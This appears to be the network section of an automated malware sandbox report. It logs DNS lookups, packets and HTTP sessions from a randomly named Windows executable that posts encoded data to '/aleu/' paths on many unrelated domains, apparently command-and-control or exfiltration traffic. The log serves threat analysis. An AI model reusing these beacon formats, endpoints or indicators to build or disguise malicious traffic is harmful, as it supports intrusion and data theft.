                                                                                                                                                                          Apr 26, 2024 07:44:08.862735033 CEST4975980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:08.865376949 CEST4975980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:09.108086109 CEST804975991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:09.108124018 CEST804975991.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:09.108203888 CEST4975980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:10.382013083 CEST4975980192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:11.397391081 CEST4976080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:11.640367985 CEST804976091.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:11.641485929 CEST4976080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:11.645379066 CEST4976080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:11.907088041 CEST804976091.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:11.907115936 CEST804976091.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:11.911746979 CEST4976080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:13.161381960 CEST4976080192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:14.178560019 CEST4976180192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:14.421673059 CEST804976191.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:14.421756029 CEST4976180192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:14.424132109 CEST4976180192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:14.666913986 CEST804976191.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:14.666940928 CEST804976191.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:14.666961908 CEST804976191.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:14.666977882 CEST804976191.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:14.667005062 CEST4976180192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:14.912466049 CEST804976191.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:16.961391926 CEST4976280192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:17.204482079 CEST804976291.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:17.204902887 CEST4976280192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:17.207461119 CEST4976280192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:17.450356007 CEST804976291.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:17.450377941 CEST804976291.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:17.453057051 CEST4976280192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:17.456109047 CEST4976280192.168.2.791.195.240.19
                                                                                                                                                                          Apr 26, 2024 07:44:17.698889971 CEST804976291.195.240.19192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.362660885 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:23.603264093 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.605525017 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:23.608436108 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:23.847970963 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.901870966 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.901897907 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.901913881 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.901959896 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.901993990 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.902029037 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.902025938 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:23.902056932 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:23.902097940 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.902118921 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:23.902159929 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.902256966 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.902271986 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:23.903565884 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:24.141849995 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:24.141885996 CEST80497633.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:24.141932964 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:25.117461920 CEST4976380192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.131334066 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.371711016 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.371817112 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.375181913 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.614692926 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681323051 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681365013 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681411982 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.681449890 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681521893 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681570053 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.681597948 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681689024 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681749105 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681797981 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.681824923 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681874990 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.681900978 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.681971073 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.682025909 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:26.924065113 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.924089909 CEST80497643.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:26.924319029 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:27.881485939 CEST4976480192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:28.896548033 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.137363911 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.143369913 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.143369913 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.398077965 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441250086 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441278934 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441294909 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441303968 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441318035 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441334963 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441351891 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441360950 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.441369057 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441385984 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441412926 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.441440105 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.441495895 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.441495895 CEST4976580192.168.2.73.125.172.46
                                                                                                                                                                          Apr 26, 2024 07:44:29.681608915 CEST80497653.125.172.46192.168.2.7
                                                                                                                                                                          Apr 26, 2024 07:44:29.681631088 CEST80497653.125.172.46192.168.2.7
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Apr 26, 2024 07:41:37.420319080 CEST | 1.1.1.1 | 192.168.2.7 | 0xb98 | No error (0) | www.maxiwalls.com | | 79.98.25.1 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:41:53.647996902 CEST | 1.1.1.1 | 192.168.2.7 | 0xa38e | Name error (3) | www.choosejungmann.com | none | none | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:42:01.956788063 CEST | 1.1.1.1 | 192.168.2.7 | 0xe32a | No error (0) | www.paydayloans3.shop | | 64.190.62.22 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:42:16.655599117 CEST | 1.1.1.1 | 192.168.2.7 | 0x5be3 | No error (0) | www.colchondealquiler.com | | 217.76.128.34 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:42:31.687937975 CEST | 1.1.1.1 | 192.168.2.7 | 0x2b06 | No error (0) | www.www60270.xyz | fix01.pfw.djamxtvyk.cloudland3.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:42:31.687937975 CEST | 1.1.1.1 | 192.168.2.7 | 0x2b06 | No error (0) | fix01.pfw.djamxtvyk.cloudland3.com | | 52.175.38.24 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:42:46.435086966 CEST | 1.1.1.1 | 192.168.2.7 | 0xf126 | No error (0) | www.skibinscy-finanse.pl | | 178.211.137.59 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:43:00.489115953 CEST | 1.1.1.1 | 192.168.2.7 | 0xab64 | Name error (3) | www.avoshield.com | none | none | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:43:09.042881966 CEST | 1.1.1.1 | 192.168.2.7 | 0x9d14 | No error (0) | www.fairmarty.top | | 203.161.46.103 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:43:23.948503971 CEST | 1.1.1.1 | 192.168.2.7 | 0xa8c1 | No error (0) | www.theertyuiergthjk.homes | | 205.234.233.38 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:43:39.205239058 CEST | 1.1.1.1 | 192.168.2.7 | 0x6ff9 | No error (0) | www.aprovapapafox.com | aprovapapafox.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:43:39.205239058 CEST | 1.1.1.1 | 192.168.2.7 | 0x6ff9 | No error (0) | aprovapapafox.com | | 162.240.81.18 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:43:54.100650072 CEST | 1.1.1.1 | 192.168.2.7 | 0x712e | No error (0) | www.83634.cn | sxp92m4v.as22566.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:43:54.100650072 CEST | 1.1.1.1 | 192.168.2.7 | 0x712e | No error (0) | sxp92m4v.as22566.com | vf3ba6qx.as22566.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:43:54.100650072 CEST | 1.1.1.1 | 192.168.2.7 | 0x712e | No error (0) | vf3ba6qx.as22566.com | | 103.93.124.160 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:43:54.100673914 CEST | 1.1.1.1 | 192.168.2.7 | 0x712e | No error (0) | www.83634.cn | sxp92m4v.as22566.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:43:54.100673914 CEST | 1.1.1.1 | 192.168.2.7 | 0x712e | No error (0) | sxp92m4v.as22566.com | vf3ba6qx.as22566.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:43:54.100673914 CEST | 1.1.1.1 | 192.168.2.7 | 0x712e | No error (0) | vf3ba6qx.as22566.com | | 103.93.124.160 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:08.616632938 CEST | 1.1.1.1 | 192.168.2.7 | 0x1709 | No error (0) | www.polhi.lol | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:44:08.616632938 CEST | 1.1.1.1 | 192.168.2.7 | 0x1709 | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:23.359947920 CEST | 1.1.1.1 | 192.168.2.7 | 0xe1c1 | No error (0) | www.valentinaetommaso.it | matrimoniovalentinaetommaso.webnode.it | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:44:23.359947920 CEST | 1.1.1.1 | 192.168.2.7 | 0xe1c1 | No error (0) | matrimoniovalentinaetommaso.webnode.it | lb.webnode.io | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:44:23.359947920 CEST | 1.1.1.1 | 192.168.2.7 | 0xe1c1 | No error (0) | lb.webnode.io | | 3.125.172.46 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:23.359947920 CEST | 1.1.1.1 | 192.168.2.7 | 0xe1c1 | No error (0) | lb.webnode.io | | 3.73.27.108 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:38.694013119 CEST | 1.1.1.1 | 192.168.2.7 | 0xa259 | Name error (3) | www.toyzonetshirts.com | none | none | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:44:47.225053072 CEST | 1.1.1.1 | 192.168.2.7 | 0xa54c | No error (0) | www.solesense.pro | parkingpage.namecheap.com | | CNAME (Canonical name) | IN (0x0001) | false
Apr 26, 2024 07:44:47.225053072 CEST | 1.1.1.1 | 192.168.2.7 | 0xa54c | No error (0) | parkingpage.namecheap.com | | 91.195.240.19 | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:45:02.445117950 CEST | 1.1.1.1 | 192.168.2.7 | 0x2dfb | Name error (3) | www.onitsuka-ksa.com | none | none | A (IP address) | IN (0x0001) | false
Apr 26, 2024 07:45:07.054883957 CEST | 1.1.1.1 | 192.168.2.7 | 0x7acd | Name error (3) | www.onitsuka-ksa.com | none | none | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49722 | 79.98.25.1 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:41:37.699114084 CEST | 500 | OUT | GET /aleu/?MzYDklf=ok/gmcxpcerYYESWh7Vklw9Bm7swo7gbVWXcVokfXup7b9fdD39fjj06OXsQXJEXHKhiFziBALjD8i0StjfBY6tcFTr5ihP/i1r4jMGBPezmBbp/yafvkg2ntS8iiyqpI2uarI9tc8j7&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Host: www.maxiwalls.com
Connection: close
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Apr 26, 2024 07:41:37.967592955 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Fri, 26 Apr 2024 05:41:37 GMT
Server: Apache
Cache-control: max-age=300
Vary: Accept-Encoding
Content-Length: 5662
Connection: close
Content-Type: text/html; charset=UTF-8
                                                                                                                                                                          Data Ascii: <!doctype html><html> <head> <meta http-equiv="content-type" content="text/html; charset=utf-8"> <meta name="robots" content="noindex, nofollow"> <meta name="viewport" content="width=800, maximum-scale=1"> <meta name="theme-color" content="#005ca3"> <meta itemprop="image" content="https://assets.iv.lt/images/thumbnail.png"> <meta property="og:image" content="https://assets.iv.lt/images/thumbnail.png"> <link rel="icon" sizes="96x96" href="https://assets.iv.lt/images/icon.png"> <link rel="apple-touch-icon" href="https://assets.iv.lt/images/icon.png"> <link rel="stylesheet" type="text/css" href="https://assets.iv.lt/default.css"> <title>maxiwalls.com - Uregistruotas domenas - Interneto vizija</title> </head> <body>... begin header --> <table align=center cellpadding=0 cellspacing=0> <tr> <td> <iframe src="https://assets.iv.lt/header.html" width=768 height=100 scrolling=no frameborder=0></iframe> </td> </tr> <tr><td height=24></td></tr> </table>... end header -->... begin body -->
Apr 26, 2024 07:41:37.967613935 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: <table width=768 align=center cellpadding=0 cellspacing=0> <tr> <td> <h1>maxiwalls.com</h1> <p> </td> </tr> <tr valign=top> <td width=508> Domenas <b>maxiwalls.com</b> skmingai uregistruotas
Apr 26, 2024 07:41:37.967633009 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: m, kad iandien pas mus savo interneto svetaines talpina ir mumis pasitiki daugiausiai alies gyventoj. <p> <table class=table> <tr> <th></th> <th>Patui</th> <th>Svetainei</th> <th>U
Apr 26, 2024 07:41:37.967653990 CEST | 1289 | IN
                                                                                                                                                                          Data Ascii: <td>+</td> <td>+</td> </tr> <tr align=center> <td align=left>Reseller</td> <td>-</td> <td>-</td> <td>-</td> <td>+</td> </tr> <tr align=center> <td align=left
Apr 26, 2024 07:41:37.967753887 CEST | 710 | IN
                                                                                                                                                                          Data Ascii: li><a target=_top href="https://www.iv.lt/profesionalus-hostingas/">Profesionalus hostingas</a> <li><a target=_top href="https://www.iv.lt/vps-serveriai/">Serveri nuoma</a> <li><a target=_top href="https://www.iv.lt/sertifikata


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49727 | 64.190.62.22 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
Timestamp | Bytes transferred | Direction | Data
Apr 26, 2024 07:42:02.204075098 CEST | 765 | OUT | POST /aleu/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Host: www.paydayloans3.shop
Origin: http://www.paydayloans3.shop
Content-Type: application/x-www-form-urlencoded
Content-Length: 220
Cache-Control: max-age=0
Connection: close
Referer: http://www.paydayloans3.shop/aleu/
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=uVtPTjiO9kY0JrbYLpteLVkciFUdeTCWfnZrqrp24Nt0fTFGNLfUd2nWJVsY7LVmSY3g2AWJ3R9+En96P4HLwB3L2gXp2qHHvpWIkRUYQEQppG+B/QsGp7y0FWwMdKh4E+P+jPS6ECflLCoE5+TAGtYeBu57by8CYpdCdtH2UAjAxnDlH+aBaqu/yo0guSY4YWg9IAKF2fTxbC8u1g==
Apr 26, 2024 07:42:02.447021008 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
date: Fri, 26 Apr 2024 05:42:02 GMT
content-type: text/html
content-length: 556
server: NginX
connection: close
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          2 | 192.168.2.7 | 49728 | 64.190.62.22 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:42:05.181227922 CEST | 785 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Origin: http://www.paydayloans3.shop
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 240
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=uVtPTjiO9kY0b6rYJKVeHlkfvVUdIjCafnlrquZm47d0c3BGMKfUc2nWB1tSkbVtSY6d2CyJ3SB+Ell6OLvMxR3z9AXRyqHHvpWIkRA+QEIppWuB9yIF3ryzAmwMZKh8E+PcjKKcEAnlLHsE5vTDPtYYfe5sdHF3BYpAQd/yehLf5xeHdcWtE7WE2qQW50FNaXklFi+kpo2bWQdqjcU0qSa5eHlj/mWFvqTaVok=
                                                                                                                                                                          Apr 26, 2024 07:42:05.425362110 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:05 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 556
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          3 | 192.168.2.7 | 49729 | 64.190.62.22 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:42:07.952651024 CEST | 1798 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Origin: http://www.paydayloans3.shop
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 1252
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.paydayloans3.shop/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Data Ascii: MzYDklf=
                                                                                                                                                                          Apr 26, 2024 07:42:08.195743084 CEST | 701 | IN | HTTP/1.1 405 Not Allowed
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:08 GMT
                                                                                                                                                                          content-type: text/html
                                                                                                                                                                          content-length: 556
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close
                                                                                                                                                                          Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>openresty</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          4 | 192.168.2.7 | 49730 | 64.190.62.22 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:42:10.721609116 CEST | 504 | OUT | GET /aleu/?MzYDklf=jXFvQTK4oWsNW5HaVP0aKlBegUUeN16TTlZ8jbhw/9BHTw5yM7uncTfMOk5Q960TVKfivgiXqRpaWw5bUpeZnRruwwT6g/D0s8W22E0wG3Y43Svl+j8+gYa6G242ZIg/F531ut75LnnH&PHaLL=ePmHKpKXdtoDqXh HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Host: www.paydayloans3.shop
                                                                                                                                                                          Connection: close
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
                                                                                                                                                                          Apr 26, 2024 07:42:10.965172052 CEST | 107 | IN | HTTP/1.1 436
                                                                                                                                                                          date: Fri, 26 Apr 2024 05:42:10 GMT
                                                                                                                                                                          content-length: 0
                                                                                                                                                                          server: NginX
                                                                                                                                                                          connection: close


                                                                                                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                          5 | 192.168.2.7 | 49731 | 217.76.128.34 | 80 | 2912 | C:\Program Files (x86)\BWNcXboUArXjpcYYhgQQHYMSOdiQYmJVkPEFMgIoTAWDCggbmmanhWchB\yTVsQcNOAKqLIKj.exe
                                                                                                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                          Apr 26, 2024 07:42:16.914031982 CEST | 777 | OUT | POST /aleu/ HTTP/1.1
                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8
                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                                          Host: www.colchondealquiler.com
                                                                                                                                                                          Origin: http://www.colchondealquiler.com
                                                                                                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                          Content-Length: 220
                                                                                                                                                                          Cache-Control: max-age=0
                                                                                                                                                                          Connection: close
                                                                                                                                                                          Referer: http://www.colchondealquiler.com/aleu/
                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
